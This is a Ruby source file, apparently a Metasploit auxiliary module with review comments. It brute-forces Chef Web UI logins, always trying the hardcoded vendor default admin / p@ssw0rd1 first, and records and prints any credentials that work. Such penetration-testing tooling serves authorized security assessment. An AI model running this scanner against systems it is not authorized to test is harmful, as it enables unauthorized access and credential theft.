GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/chef_webui_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/login_scanner/chef_webui'
require 'metasploit/framework/credential_collection'
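# Auxiliary scanner that tries username/password pairs against a Chef Web UI
# login page and records the outcome of every attempt through the framework's
# credential-reporting helpers (create_credential, create_credential_login,
# invalidate_login).
#
# The pair admin / p@ssw0rd1 is always queued ahead of any operator-supplied
# credentials (see #init_loginscanner), so a hit on the first attempt means
# the instance is still running with the vendor default password.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers the module metadata and its options.
  #
  # SSL defaults to true and RPORT to 443; USERNAME and PASSWORD are optional
  # and default to the empty string; TARGETURI is required and defaults to '/'.
  def initialize
    super(
      'Name' => 'Chef Web UI Brute Force Utility',
      'Description' => %q{
        This module attempts to login to Chef Web UI server instance using username and password
        combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It
        will also test for the default login (admin:p@ssw0rd1).
      },
      'Author' => [
        'hdm'
      ],
      'License' => MSF_LICENSE,
      'DefaultOptions' => {
        'SSL' => true,
      }
    )

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('USERNAME', [false, 'The username to specify for authentication', '']),
        OptString.new('PASSWORD', [false, 'The password to specify for authentication', '']),
        OptString.new('TARGETURI', [true, 'The path to the Chef Web UI application', '/']),
      ]
    )
  end

  #
  # main
  #
  # Per-host entry point: builds the login scanner, stops with an error line
  # when the scanner's check_setup returns a message, otherwise starts the
  # credential loop.
  #
  # @param ip [String] address of the host being scanned
  def run_host(ip)
    init_loginscanner(ip)

    # check_setup is treated as "falsy means OK, anything else is the reason
    # the target does not look usable".
    setup_error = @scanner.check_setup
    if setup_error
      print_brute level: :error, ip: rhost, msg: setup_error
      return
    end

    print_brute level: :status, ip: rhost, msg: "Found Chef Web UI application at #{datastore['TARGETURI']}"
    bruteforce(ip)
  end

  # Runs the scanner over the credential collection and handles each result
  # according to its status.
  #
  # SUCCESSFUL and DENIED_ACCESS are both reported as working credentials via
  # #do_report; UNABLE_TO_CONNECT and INCORRECT are passed to invalidate_login.
  #
  # NOTE(review): the case has no else branch, so any other status value the
  # scanner yields produces no output and no invalidate_login call.
  # NOTE(review): the :next_user / :abort symbols are the block's return
  # values; whether scan! acts on them is not visible in this file - confirm
  # against the LoginScanner implementation.
  #
  # @param ip [String] address of the host being scanned
  def bruteforce(ip)
    @scanner.scan! do |result|
      case result.status
      when Metasploit::Model::Login::Status::SUCCESSFUL
        # The message includes the credential itself, so console output and
        # any spooled log will contain the cleartext password.
        print_brute level: :good, ip: ip, msg: "Success: '#{result.credential}'"
        do_report(ip, rport, result)
        :next_user
      when Metasploit::Model::Login::Status::DENIED_ACCESS
        print_brute level: :status, ip: ip, msg: "Correct credentials, but unable to login: '#{result.credential}'"
        do_report(ip, rport, result)
        :next_user
      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
        print_brute level: :verror, ip: ip, msg: "Could not connect" if datastore['VERBOSE']
        invalidate_attempt(ip, result)
        :abort
      when Metasploit::Model::Login::Status::INCORRECT
        print_brute level: :verror, ip: ip, msg: "Failed: '#{result.credential}'" if datastore['VERBOSE']
        invalidate_attempt(ip, result)
      end
    end
  end

  # Reports a credential that the target accepted.
  #
  # Builds the service description, passes the username/password pair to
  # create_credential, then ties the resulting core to the service with
  # create_credential_login, stamped with the current time and the result's
  # status.
  #
  # NOTE(review): service_name is the literal 'http' even though the module
  # defaults SSL to true - confirm this is the intended value for the
  # reported service.
  #
  # @param ip [String] address of the host the credential worked on
  # @param port [Integer] port of the service
  # @param result [Object] scanner result; its credential and status are read
  def do_report(ip, port, result)
    service_data = {
      address: ip,
      port: port,
      service_name: 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: self.fullname,
      origin_type: :service,
      private_data: result.credential.private,
      private_type: :password,
      username: result.credential.public,
    }.merge(service_data)

    credential_core = create_credential(credential_data)

    login_data = {
      core: credential_core,
      last_attempted_at: DateTime.now,
      status: result.status
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Builds @cred_collection and @scanner for one host.
  #
  # The collection starts from the USERNAME / PASSWORD datastore values
  # (build_credential_collection may add more - not visible here), and the
  # default admin / p@ssw0rd1 pair is prepended so it is attempted first.
  #
  # @param ip [String] address of the host being scanned (not used in the body)
  def init_loginscanner(ip)
    @cred_collection = build_credential_collection(
      username: datastore['USERNAME'],
      password: datastore['PASSWORD']
    )

    # Always try the default first
    default_cred = Metasploit::Framework::Credential.new(public: 'admin', private: 'p@ssw0rd1')
    @cred_collection.prepend_cred(default_cred)

    scanner_config = configure_http_login_scanner(
      uri: datastore['TARGETURI'],
      cred_details: @cred_collection,
      stop_on_success: datastore['STOP_ON_SUCCESS'],
      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
      connection_timeout: 5,
      http_username: datastore['HttpUsername'],
      http_password: datastore['HttpPassword']
    )

    @scanner = Metasploit::Framework::LoginScanner::ChefWebUI.new(scanner_config)
  end

  private

  # Passes a non-working attempt to invalidate_login. Shared by the
  # UNABLE_TO_CONNECT and INCORRECT branches of #bruteforce, which send the
  # same set of fields.
  #
  # @param ip [String] address of the host the attempt was made against
  # @param result [Object] scanner result; its credential and status are read
  # @return whatever invalidate_login returns
  def invalidate_attempt(ip, result)
    attempted = result.credential

    invalidate_login(
      address: ip,
      port: rport,
      protocol: 'tcp',
      public: attempted.public,
      private: attempted.private,
      realm_key: attempted.realm_key,
      realm_value: attempted.realm,
      status: result.status
    )
  end
end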